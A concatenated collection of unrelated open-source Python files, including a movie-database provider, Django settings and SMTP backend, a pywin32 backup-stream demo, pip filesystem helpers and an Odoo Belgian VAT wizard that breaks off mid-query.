from libs.themoviedb import tmdb
log = CPLog(__name__)
class TheMovieDb(MovieProvider):
def __init__(self):
addEvent('movie.by_hash', self.byHash)
addEvent('movie.search', self.search, priority = 2)
addEvent('movie.info', self.getInfo, priority = 2)
addEvent('movie.info_by_tmdb', self.getInfoByTMDBId)
# Use base wrapper
tmdb.configure(self.conf('api_key'))
def byHash(self, file):
''' Find movie by hash '''
if self.isDisabled():
return False
cache_key = 'tmdb.cache.%s' % simplifyString(file)
results = self.getCache(cache_key)
if not results:
log.debug('Searching for movie by hash: %s', file)
try:
raw = tmdb.searchByHashingFile(file)
results = []
if raw:
try:
results = self.parseMovie(raw)
log.info('Found: %s', results['titles'][0] + ' (' + str(results['year']) + ')')
self.setCache(cache_key, results)
return results
except SyntaxError, e:
log.error('Failed to parse XML response: %s', e)
return False
except:
log.debug('No movies known by hash for: %s', file)
pass
return results
def search(self, q, limit = 12):
''' Find movie by name '''
if self.isDisabled():
return False
search_string = simplifyString(q)
cache_key = 'tmdb.cache.%s.%s' % (search_string, limit)
results = self.getCache(cache_key)
if not results:
log.debug('Searching for movie: %s', q)
raw = tmdb.search(search_string)
results = []
if raw:
try:
nr = 0
for movie in raw:
results.append(self.parseMovie(movie))
nr += 1
if nr == limit:
break
log.info('Found: %s', [result['titles'][0] + ' (' + str(result['year']) + ')' for result in results])
self.setCache(cache_key, results)
return results
except SyntaxError, e:
log.error('Failed to parse XML response: %s', e)
return False
return results
def getInfo(self, identifier = None):
if not identifier:
return {}
cache_key = 'tmdb.cache.%s' % identifier
result = self.getCache(cache_key)
if not result:
result = {}
movie = None
try:
log.debug('Getting info: %s', cache_key)
movie = tmdb.imdbLookup(id = identifier)
except:
pass
if movie:
result = self.parseMovie(movie[0])
self.setCache(cache_key, result)
return result
def getInfoByTMDBId(self, id = None):
cache_key = 'tmdb.cache.%s' % id
result = self.getCache(cache_key)
if not result:
result = {}
movie = None
try:
log.debug('Getting info: %s', cache_key)
movie = tmdb.getMovieInfo(id = id)
except:
pass
if movie:
result = self.parseMovie(movie)
self.setCache(cache_key, result)
return result
def parseMovie(self, movie):
# Images
poster = self.getImage(movie, type = 'poster', size = 'cover')
#backdrop = self.getImage(movie, type = 'backdrop', size = 'w1280')
poster_original = self.getImage(movie, type = 'poster', size = 'original')
backdrop_original = self.getImage(movie, type = 'backdrop', size = 'original')
# Genres
try:
genres = self.getCategory(movie, 'genre')
except:
genres = []
# 1900 is the same as None
year = str(movie.get('released', 'none'))[:4]
if year == '1900' or year.lower() == 'none':
year = None
movie_data = {
'via_tmdb': True,
'tmdb_id': int(movie.get('id', 0)),
'titles': [toUnicode(movie.get('name'))],
'original_title': movie.get('original_name'),
'images': {
'poster': [poster] if poster else [],
#'backdrop': [backdrop] if backdrop else [],
'poster_original': [poster_original] if poster_original else [],
'backdrop_original': [backdrop_original] if backdrop_original else [],
},
'imdb': movie.get('imdb_id'),
'runtime': movie.get('runtime'),
'released': movie.get('released'),
'year': year,
'plot': movie.get('overview', ''),
'tagline': '',
'genres': genres,
}
# Add alternative names
for alt in ['original_name', 'alternative_name']:
alt_name = toUnicode(movie.get(alt))
if alt_name and not alt_name in movie_data['titles'] and alt_name.lower() != 'none' and alt_name != None:
movie_data['titles'].append(alt_name)
return movie_data
def getImage(self, movie, type = 'poster', size = 'cover'):
image_url = ''
for image in movie.get('images', []):
if(image.get('type') == type) and image.get(size):
image_url = image.get(size)
break
return image_url
def getCategory(self, movie, type = 'genre'):
cats = movie.get('categories', {}).get(type)
categories = []
for category in cats:
try:
categories.append(category)
except:
pass
return categories
def isDisabled(self):
if self.conf('api_key') == '':
log.error('No API key provided.')
True
else:
False
|
largelymfs/w2vtools | refs/heads/master | build/scipy/scipy/optimize/tnc/example.py | 95 | #!/usr/bin/env python
# Python TNC example
# @(#) $Jeannot: example.py,v 1.4 2004/04/02 18:51:04 js Exp $
from __future__ import division, print_function, absolute_import
import tnc
# A function to minimize
# Must return a tuple with the function value and the gradient (as a list)
# or None to abort the minimization
def function(x):
f = pow(x[0],2.0)+pow(abs(x[1]),3.0)
g = [0,0]
g[0] = 2.0*x[0]
g[1] = 3.0*pow(abs(x[1]),2.0)
if x[1] < 0:
g[1] = -g[1]
return f, g
# Optimizer call
rc, nf, x = tnc.minimize(function, [-7, 3], [-10, 1], [10, 10])
print("After", nf, "function evaluations, TNC returned:", tnc.RCSTRINGS[rc])
print("x =", x)
print("exact value = [0, 1]")
|
kz26/bang-at-uchicago | refs/heads/master | app/local_settings.py | 1 | # Django settings for app project.
import os
from datetime import timedelta
SITE_ROOT = os.path.dirname(os.path.realpath(__file__))
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
('admin', 'bang@bangatuchicago.com'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': os.path.join(SITE_ROOT, 'main.sqlite'), # Or path to database file if using sqlite3.
# The following settings are not used with sqlite3:
'USER': '',
'PASSWORD': '',
'HOST': '', # Empty for localhost through domain sockets or '127.0.0.1' for localhost through TCP.
'PORT': '', # Set to empty string for default.
}
}
# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts
ALLOWED_HOSTS = []
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = False
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/var/www/example.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://example.com/media/", "http://media.example.com/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/var/www/example.com/static/"
STATIC_ROOT = ''
# URL prefix for static files.
# Example: "http://example.com/static/", "http://static.example.com/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
os.path.join(SITE_ROOT, 'static'),
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
'compressor.finders.CompressorFinder'
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'SECRET KEY HERE'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'app.main.middleware.AngularCSRFRename',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# Uncomment the next line for simple clickjacking protection:
# 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'app.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'app.wsgi.application'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
os.path.join(SITE_ROOT, 'templates'),
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Uncomment the next line to enable the admin:
'django.contrib.admin',
# Uncomment the next line to enable admin documentation:
# 'django.contrib.admindocs',
'south', 'rest_framework', 'djcelery', 'compressor',
'app.main',
)
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
# Caching
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',
'LOCATION': '127.0.0.1:11211',
}
}
# Django Compressor
COMPRESS_ENABLED = True
COMPRESS_PRECOMPILERS = (
('text/coffeescript', 'coffee -bcs'),
('text/less', 'lessc {infile} {outfile}'),
)
COMPRESS_ROOT = os.path.join(SITE_ROOT, 'static')
# AngularJS integration
CSRF_COOKIE_NAME = "XSRF-TOKEN"
# Celery
import djcelery
djcelery.setup_loader()
BROKER_URL = "amqp://guest@localhost//"
CELERYBEAT_SCHEDULE = {
'mark_matches_read': {
'task': 'app.main.tasks.mark_matches_read',
'schedule': timedelta(seconds=600)
}
}
# App-specific configuration
LDAP_SERVER = "ldap://ldap.uchicago.edu:389"
LDAP_BASE_DN = "dc=uchicago,dc=edu"
PASSWORD_RESET_EXPIRY = 3600
# Email
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
DEFAULT_FROM_EMAIL = "bang@bangatuchicago.com"
|
gizmag/django-mobile | refs/heads/master | django_mobile/compat.py | 6 | try:
from django.template.engine import Engine
from django.template.loaders.base import Loader as BaseLoader
except ImportError: # Django < 1.8
Engine = None
from django.template.loader import BaseLoader, find_template_loader, get_template_from_string
def template_loader(loader_name):
if Engine:
return Engine.get_default().find_template_loader(loader_name)
else: # Django < 1.8
return find_template_loader(loader_name)
def template_from_string(template_code):
if Engine:
return Engine().from_string(template_code)
else: # Django < 1.8
return get_template_from_string(template_code)
def get_engine():
if Engine:
return Engine.get_default()
else: # Django < 1.8
return None
|
Nymeria8/NGS_utilities | refs/heads/master | categorize.py | 1 | #!/usr/bin/python3
# This scripts was used as part of a redundancy pipeline. It forms groups of homologies, when a homologie search of sequences against themselves is made. It clusters the sequences by their mutual hits
#The output is a list of fasta headers, where each cluster is divided by "---\n"
#python categorize.py tabular_blast_output_outfmt6 outfile
infile = open(argv[1],'r')
outfile=open(argv[2],"w")
title = ""
scaf = set()
scafs = []
for lines in infile:
lines = lines.split()
if lines[0] != title:
title = lines[0]
scafs.append(scaf)
scaf = set()
x=0
size=lines[0].split("e")
if float(size[1])/float(lines[3])<=2.0 and x<=1:
scaf.add(lines[1])
x+=1
else:
size=lines[0].split("e")
if float(size[1])/float(lines[3])<=2.0 and x<=1:
scaf.add(lines[1])
x+=1
scafs.append(scafs)
del scafs[0]
del scafs[-1]
infile.close()
def consolidate(sets):
setlist = [s for s in sets if s]
for i, s1 in enumerate(setlist):
if s1:
for s2 in setlist[i+1:]:
intersection = s1.intersection(s2)
if intersection:
s2.update(s1)
s1.clear()
s1 = s2
return [s for s in setlist if s]
for i in consolidate(scafs):
for a in i:
outfile.write(a+"\n")
outfile.write("---\n")
outfile.close()
|
perezg/infoxchange | refs/heads/master | BASE/lib/python2.7/site-packages/django/core/mail/backends/smtp.py | 130 | """SMTP email backend class."""
import smtplib
import ssl
import threading
from django.conf import settings
from django.core.mail.backends.base import BaseEmailBackend
from django.core.mail.utils import DNS_NAME
from django.core.mail.message import sanitize_address
from django.utils.encoding import force_bytes
class EmailBackend(BaseEmailBackend):
"""
A wrapper that manages the SMTP network connection.
"""
def __init__(self, host=None, port=None, username=None, password=None,
use_tls=None, fail_silently=False, **kwargs):
super(EmailBackend, self).__init__(fail_silently=fail_silently)
self.host = host or settings.EMAIL_HOST
self.port = port or settings.EMAIL_PORT
if username is None:
self.username = settings.EMAIL_HOST_USER
else:
self.username = username
if password is None:
self.password = settings.EMAIL_HOST_PASSWORD
else:
self.password = password
if use_tls is None:
self.use_tls = settings.EMAIL_USE_TLS
else:
self.use_tls = use_tls
self.connection = None
self._lock = threading.RLock()
def open(self):
"""
Ensures we have a connection to the email server. Returns whether or
not a new connection was required (True or False).
"""
if self.connection:
# Nothing to do if the connection is already open.
return False
try:
# If local_hostname is not specified, socket.getfqdn() gets used.
# For performance, we use the cached FQDN for local_hostname.
self.connection = smtplib.SMTP(self.host, self.port,
local_hostname=DNS_NAME.get_fqdn())
if self.use_tls:
self.connection.ehlo()
self.connection.starttls()
self.connection.ehlo()
if self.username and self.password:
self.connection.login(self.username, self.password)
return True
except:
if not self.fail_silently:
raise
def close(self):
"""Closes the connection to the email server."""
if self.connection is None:
return
try:
try:
self.connection.quit()
except (ssl.SSLError, smtplib.SMTPServerDisconnected):
# This happens when calling quit() on a TLS connection
# sometimes, or when the connection was already disconnected
# by the server.
self.connection.close()
except:
if self.fail_silently:
return
raise
finally:
self.connection = None
def send_messages(self, email_messages):
"""
Sends one or more EmailMessage objects and returns the number of email
messages sent.
"""
if not email_messages:
return
with self._lock:
new_conn_created = self.open()
if not self.connection:
# We failed silently on open().
# Trying to send would be pointless.
return
num_sent = 0
for message in email_messages:
sent = self._send(message)
if sent:
num_sent += 1
if new_conn_created:
self.close()
return num_sent
def _send(self, email_message):
"""A helper method that does the actual sending."""
if not email_message.recipients():
return False
from_email = sanitize_address(email_message.from_email, email_message.encoding)
recipients = [sanitize_address(addr, email_message.encoding)
for addr in email_message.recipients()]
message = email_message.message()
charset = message.get_charset().get_output_charset() if message.get_charset() else 'utf-8'
try:
self.connection.sendmail(from_email, recipients,
force_bytes(message.as_string(), charset))
except:
if not self.fail_silently:
raise
return False
return True
|
chenss/ChatRoom | refs/heads/master | 14.5 已经能运行(虽然有很多Warning)的Django-nonrel框架/django/contrib/gis/db/backends/mysql/base.py | 308 | from django.db.backends.mysql.base import *
from django.db.backends.mysql.base import DatabaseWrapper as MySQLDatabaseWrapper
from django.contrib.gis.db.backends.mysql.creation import MySQLCreation
from django.contrib.gis.db.backends.mysql.introspection import MySQLIntrospection
from django.contrib.gis.db.backends.mysql.operations import MySQLOperations
class DatabaseWrapper(MySQLDatabaseWrapper):
def __init__(self, *args, **kwargs):
super(DatabaseWrapper, self).__init__(*args, **kwargs)
self.creation = MySQLCreation(self)
self.ops = MySQLOperations()
self.introspection = MySQLIntrospection(self)
|
alanjw/GreenOpenERP-Win-X86 | refs/heads/7.0 | python/Lib/site-packages/win32/Demos/BackupRead_BackupWrite.py | 4 | ## demonstrates using BackupRead and BackupWrite to copy all of a file's data streams
import win32file, win32api, win32con, win32security, ntsecuritycon
from win32com import storagecon
import pythoncom, pywintypes
import struct, traceback
from pywin32_testutil import str2bytes, ob2memory
all_sd_info=win32security.DACL_SECURITY_INFORMATION|win32security.DACL_SECURITY_INFORMATION| \
win32security.OWNER_SECURITY_INFORMATION|win32security.GROUP_SECURITY_INFORMATION
tempdir=win32api.GetTempPath()
tempfile=win32api.GetTempFileName(tempdir,'bkr')[0]
outfile=win32api.GetTempFileName(tempdir,'out')[0]
print 'Filename:',tempfile,'Output file:',outfile
f=open(tempfile,'w')
f.write('some random junk'+'x'*100)
f.close()
## add a couple of alternate data streams
f=open(tempfile+':streamdata','w')
f.write('data written to alternate stream'+'y'*100)
f.close()
f=open(tempfile+':anotherstream','w')
f.write('z'*100)
f.close()
## add Summary Information, which is stored as a separate stream
m=storagecon.STGM_READWRITE | storagecon.STGM_SHARE_EXCLUSIVE |storagecon.STGM_DIRECT
pss=pythoncom.StgOpenStorageEx(tempfile, m, storagecon.STGFMT_FILE, 0 , pythoncom.IID_IPropertySetStorage,None)
ps=pss.Create(pythoncom.FMTID_SummaryInformation,pythoncom.IID_IPropertyStorage,0,storagecon.STGM_READWRITE|storagecon.STGM_SHARE_EXCLUSIVE)
ps.WriteMultiple((storagecon.PIDSI_KEYWORDS,storagecon.PIDSI_COMMENTS),('keywords','comments'))
ps=None
pss=None
## add a custom security descriptor to make sure we don't
## get a default that would always be the same for both files in temp dir
new_sd=pywintypes.SECURITY_DESCRIPTOR()
sid=win32security.LookupAccountName('','EveryOne')[0]
acl=pywintypes.ACL()
acl.AddAccessAllowedAce(1, win32con.GENERIC_READ, sid)
acl.AddAccessAllowedAce(1, ntsecuritycon.FILE_APPEND_DATA, sid)
acl.AddAccessAllowedAce(1, win32con.GENERIC_WRITE, sid)
acl.AddAccessAllowedAce(1, ntsecuritycon.FILE_ALL_ACCESS, sid)
new_sd.SetSecurityDescriptorDacl(True, acl, False)
win32security.SetFileSecurity(tempfile,win32security.DACL_SECURITY_INFORMATION,new_sd)
sa=pywintypes.SECURITY_ATTRIBUTES()
sa.bInheritHandle=True
h=win32file.CreateFile(tempfile, win32con.GENERIC_ALL ,win32con.FILE_SHARE_READ,
sa, win32con.OPEN_EXISTING, win32file.FILE_FLAG_BACKUP_SEMANTICS , None)
outh=win32file.CreateFile(outfile, win32con.GENERIC_ALL ,win32con.FILE_SHARE_READ|win32con.FILE_SHARE_WRITE,
sa, win32con.OPEN_EXISTING, win32file.FILE_FLAG_BACKUP_SEMANTICS , None)
ctxt=0
outctxt=0
buf=None
readsize=100
while 1:
bytes_read, buf, ctxt=win32file.BackupRead(h, readsize, buf, False, True, ctxt)
if bytes_read==0:
break
bytes_written, outctxt=win32file.BackupWrite(outh, bytes_read, buf, False, True, outctxt)
print 'Written:',bytes_written,'Context:',outctxt
win32file.BackupRead(h, 0, buf, True, True, ctxt)
win32file.BackupWrite(outh, 0, str2bytes(''), True, True, outctxt)
win32file.CloseHandle(h)
win32file.CloseHandle(outh)
assert open(tempfile).read()==open(outfile).read(),"File contents differ !"
assert open(tempfile+':streamdata').read()==open(outfile+':streamdata').read(),"streamdata contents differ !"
assert open(tempfile+':anotherstream').read()==open(outfile+':anotherstream').read(),"anotherstream contents differ !"
assert ob2memory(win32security.GetFileSecurity(tempfile,all_sd_info))[:]== \
ob2memory(win32security.GetFileSecurity(outfile, all_sd_info))[:], "Security descriptors are different !"
## also should check Summary Info programatically
|
google/material-design-icons | refs/heads/master | update/venv/lib/python3.9/site-packages/pip/_internal/utils/filesystem.py | 2 | import fnmatch
import os
import os.path
import random
import shutil
import stat
import sys
from contextlib import contextmanager
from tempfile import NamedTemporaryFile
from typing import Any, BinaryIO, Iterator, List, Union, cast
from pip._vendor.tenacity import retry, stop_after_delay, wait_fixed
from pip._internal.utils.compat import get_path_uid
from pip._internal.utils.misc import format_size
def check_path_owner(path):
# type: (str) -> bool
# If we don't have a way to check the effective uid of this process, then
# we'll just assume that we own the directory.
if sys.platform == "win32" or not hasattr(os, "geteuid"):
return True
assert os.path.isabs(path)
previous = None
while path != previous:
if os.path.lexists(path):
# Check if path is writable by current user.
if os.geteuid() == 0:
# Special handling for root user in order to handle properly
# cases where users use sudo without -H flag.
try:
path_uid = get_path_uid(path)
except OSError:
return False
return path_uid == 0
else:
return os.access(path, os.W_OK)
else:
previous, path = path, os.path.dirname(path)
return False # assume we don't own the path
def copy2_fixed(src, dest):
# type: (str, str) -> None
"""Wrap shutil.copy2() but map errors copying socket files to
SpecialFileError as expected.
See also https://bugs.python.org/issue37700.
"""
try:
shutil.copy2(src, dest)
except OSError:
for f in [src, dest]:
try:
is_socket_file = is_socket(f)
except OSError:
# An error has already occurred. Another error here is not
# a problem and we can ignore it.
pass
else:
if is_socket_file:
raise shutil.SpecialFileError(f"`{f}` is a socket")
raise
def is_socket(path):
# type: (str) -> bool
return stat.S_ISSOCK(os.lstat(path).st_mode)
@contextmanager
def adjacent_tmp_file(path, **kwargs):
# type: (str, **Any) -> Iterator[BinaryIO]
"""Return a file-like object pointing to a tmp file next to path.
The file is created securely and is ensured to be written to disk
after the context reaches its end.
kwargs will be passed to tempfile.NamedTemporaryFile to control
the way the temporary file will be opened.
"""
with NamedTemporaryFile(
delete=False,
dir=os.path.dirname(path),
prefix=os.path.basename(path),
suffix=".tmp",
**kwargs,
) as f:
result = cast(BinaryIO, f)
try:
yield result
finally:
result.flush()
os.fsync(result.fileno())
# Tenacity raises RetryError by default, explictly raise the original exception
_replace_retry = retry(reraise=True, stop=stop_after_delay(1), wait=wait_fixed(0.25))
replace = _replace_retry(os.replace)
# test_writable_dir and _test_writable_dir_win are copied from Flit,
# with the author's agreement to also place them under pip's license.
def test_writable_dir(path):
# type: (str) -> bool
"""Check if a directory is writable.
Uses os.access() on POSIX, tries creating files on Windows.
"""
# If the directory doesn't exist, find the closest parent that does.
while not os.path.isdir(path):
parent = os.path.dirname(path)
if parent == path:
break # Should never get here, but infinite loops are bad
path = parent
if os.name == "posix":
return os.access(path, os.W_OK)
return _test_writable_dir_win(path)
def _test_writable_dir_win(path):
# type: (str) -> bool
# os.access doesn't work on Windows: http://bugs.python.org/issue2528
# and we can't use tempfile: http://bugs.python.org/issue22107
basename = "accesstest_deleteme_fishfingers_custard_"
alphabet = "abcdefghijklmnopqrstuvwxyz0123456789"
for _ in range(10):
name = basename + "".join(random.choice(alphabet) for _ in range(6))
file = os.path.join(path, name)
try:
fd = os.open(file, os.O_RDWR | os.O_CREAT | os.O_EXCL)
except FileExistsError:
pass
except PermissionError:
# This could be because there's a directory with the same name.
# But it's highly unlikely there's a directory called that,
# so we'll assume it's because the parent dir is not writable.
# This could as well be because the parent dir is not readable,
# due to non-privileged user access.
return False
else:
os.close(fd)
os.unlink(file)
return True
# This should never be reached
raise OSError("Unexpected condition testing for writable directory")
def find_files(path, pattern):
# type: (str, str) -> List[str]
"""Returns a list of absolute paths of files beneath path, recursively,
with filenames which match the UNIX-style shell glob pattern."""
result = [] # type: List[str]
for root, _, files in os.walk(path):
matches = fnmatch.filter(files, pattern)
result.extend(os.path.join(root, f) for f in matches)
return result
def file_size(path):
# type: (str) -> Union[int, float]
# If it's a symlink, return 0.
if os.path.islink(path):
return 0
return os.path.getsize(path)
def format_file_size(path):
# type: (str) -> str
return format_size(file_size(path))
def directory_size(path):
# type: (str) -> Union[int, float]
size = 0.0
for root, _dirs, files in os.walk(path):
for filename in files:
file_path = os.path.join(root, filename)
size += file_size(file_path)
return size
def format_directory_size(path):
# type: (str) -> str
return format_size(directory_size(path))
|
ryfeus/lambda-packs | refs/heads/master | Tensorflow/source/pbr/hooks/base.py | 101 | # Copyright 2013 Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
class BaseConfig(object):
section = None
def __init__(self, config):
self._global_config = config
self.config = self._global_config.get(self.section, dict())
self.pbr_config = config.get('pbr', dict())
def run(self):
self.hook()
self.save()
def hook(self):
pass
def save(self):
self._global_config[self.section] = self.config
|
hmen89/odoo | refs/heads/master | addons/l10n_be/wizard/l10n_be_vat_intra.py | 332 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# Adapted by Noviat to
# - make the 'mand_id' field optional
# - support Noviat tax code scheme
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
import base64
from openerp.osv import fields, osv
from openerp.tools.translate import _
from openerp.report import report_sxw
class partner_vat_intra(osv.osv_memory):
"""
Partner Vat Intra
"""
_name = "partner.vat.intra"
_description = 'Partner VAT Intra'
def _get_xml_data(self, cr, uid, context=None):
if context.get('file_save', False):
return base64.encodestring(context['file_save'].encode('utf8'))
return ''
def _get_europe_country(self, cursor, user, context=None):
return self.pool.get('res.country').search(cursor, user, [('code', 'in', ['AT', 'BG', 'CY', 'CZ', 'DK', 'EE', 'FI', 'FR', 'DE', 'GR', 'HU', 'IE', 'IT', 'LV', 'LT', 'LU', 'MT', 'NL', 'PL', 'PT', 'RO', 'SK', 'SI', 'ES', 'SE', 'GB'])])
_columns = {
'name': fields.char('File Name'),
'period_code': fields.char('Period Code', size=6, required=True, help='''This is where you have to set the period code for the intracom declaration using the format: ppyyyy
PP can stand for a month: from '01' to '12'.
PP can stand for a trimester: '31','32','33','34'
The first figure means that it is a trimester,
The second figure identify the trimester.
PP can stand for a complete fiscal year: '00'.
YYYY stands for the year (4 positions).
'''
),
'period_ids': fields.many2many('account.period', 'account_period_rel', 'acc_id', 'period_id', 'Period (s)', help = 'Select here the period(s) you want to include in your intracom declaration'),
'tax_code_id': fields.many2one('account.tax.code', 'Company', domain=[('parent_id', '=', False)], help="Keep empty to use the user's company", required=True),
'test_xml': fields.boolean('Test XML file', help="Sets the XML output as test file"),
'mand_id' : fields.char('Reference', help="Reference given by the Representative of the sending company."),
'msg': fields.text('File created', readonly=True),
'no_vat': fields.text('Partner With No VAT', readonly=True, help="The Partner whose VAT number is not defined and they are not included in XML File."),
'file_save' : fields.binary('Save File', readonly=True),
'country_ids': fields.many2many('res.country', 'vat_country_rel', 'vat_id', 'country_id', 'European Countries'),
'comments': fields.text('Comments'),
}
def _get_tax_code(self, cr, uid, context=None):
obj_tax_code = self.pool.get('account.tax.code')
obj_user = self.pool.get('res.users')
company_id = obj_user.browse(cr, uid, uid, context=context).company_id.id
tax_code_ids = obj_tax_code.search(cr, uid, [('company_id', '=', company_id), ('parent_id', '=', False)], context=context)
return tax_code_ids and tax_code_ids[0] or False
_defaults = {
'country_ids': _get_europe_country,
'file_save': _get_xml_data,
'name': 'vat_intra.xml',
'tax_code_id': _get_tax_code,
}
def _get_datas(self, cr, uid, ids, context=None):
"""Collects require data for vat intra xml
:param ids: id of wizard.
:return: dict of all data to be used to generate xml for Partner VAT Intra.
:rtype: dict
"""
if context is None:
context = {}
obj_user = self.pool.get('res.users')
obj_sequence = self.pool.get('ir.sequence')
obj_partner = self.pool.get('res.partner')
xmldict = {}
post_code = street = city = country = data_clientinfo = ''
seq = amount_sum = 0
wiz_data = self.browse(cr, uid, ids[0], context=context)
comments = wiz_data.comments
if wiz_data.tax_code_id:
data_company = wiz_data.tax_code_id.company_id
else:
data_company = obj_user.browse(cr, uid, uid, context=context).company_id
# Get Company vat
company_vat = data_company.partner_id.vat
if not company_vat:
raise osv.except_osv(_('Insufficient Data!'),_('No VAT number associated with your company.'))
company_vat = company_vat.replace(' ','').upper()
issued_by = company_vat[:2]
if len(wiz_data.period_code) != 6:
raise osv.except_osv(_('Error!'), _('Period code is not valid.'))
if not wiz_data.period_ids:
raise osv.except_osv(_('Insufficient Data!'),_('Please select at least one Period.'))
p_id_list = obj_partner.search(cr, uid, [('vat','!=',False)], context=context)
if not p_id_list:
raise osv.except_osv(_('Insufficient Data!'),_('No partner has a VAT number associated with him.'))
seq_declarantnum = obj_sequence.get(cr, uid, 'declarantnum')
dnum = company_vat[2:] + seq_declarantnum[-4:]
addr = obj_partner.address_get(cr, uid, [data_company.partner_id.id], ['invoice'])
email = data_company.partner_id.email or ''
phone = data_company.partner_id.phone or ''
if addr.get('invoice',False):
ads = obj_partner.browse(cr, uid, [addr['invoice']])[0]
city = (ads.city or '')
post_code = (ads.zip or '')
if ads.street:
street = ads.street
if ads.street2:
street += ' '
street += ads.street2
if ads.country_id:
country = ads.country_id.code
if not country:
country = company_vat[:2]
if not email:
raise osv.except_osv(_('Insufficient Data!'),_('No email address associated with the company.'))
if not phone:
raise osv.except_osv(_('Insufficient Data!'),_('No phone associated with the company.'))
xmldict.update({
'company_name': data_company.name,
'company_vat': company_vat,
'vatnum': company_vat[2:],
'mand_id': wiz_data.mand_id,
'sender_date': str(time.strftime('%Y-%m-%d')),
'street': street,
'city': city,
'post_code': post_code,
'country': country,
'email': email,
'phone': phone.replace('/','').replace('.','').replace('(','').replace(')','').replace(' ',''),
'period': wiz_data.period_code,
'clientlist': [],
'comments': comments,
'issued_by': issued_by,
})
#tax code 44: services
#tax code 46L: normal good deliveries
#tax code 46T: ABC good deliveries
#tax code 48xxx: credite note on tax code xxx
codes = ('44', '46L', '46T', '48s44', '48s46L', '48s46T')
cr.execute('''SELECT p.name As partner_name, l.partner_id AS partner_id, p.vat AS vat,
(CASE WHEN t.code = '48s44' THEN '44'
WHEN t.code = '48s46L' THEN '46L'
WHEN t.code = '48s46T' THEN '46T'
ELSE t.code END) AS intra_code,
SUM(CASE WHEN t.code in ('48s44','48s46L','48s46T') THEN -l.tax_amount ELSE l.tax_amount END) AS amount
FROM account_move_line l
LEFT JOIN account_tax_code t ON (l.tax_code_id = t.id)
LEFT JOIN res_partner p ON (l.partner_id = p.id)
WHERE t.code IN %s
AND l.period_id IN %s
AND t.company_id = %s
